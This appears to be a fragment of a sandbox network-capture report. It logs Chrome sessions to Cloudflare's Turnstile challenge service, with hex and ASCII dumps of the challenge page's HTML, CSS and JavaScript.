                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    14192.168.2.449757104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC799OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://hfj.rontishet.ru/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 164872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    referrer-policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    origin-agent-cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    document-policy: js-profiling
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 62 35 65 32 33 37 61 62 38 38 30 66 34 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Server: cloudflareCF-RAY: 8cb5e237ab880f47-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    15192.168.2.449759104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC383OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 47262
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e237ff74de95-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
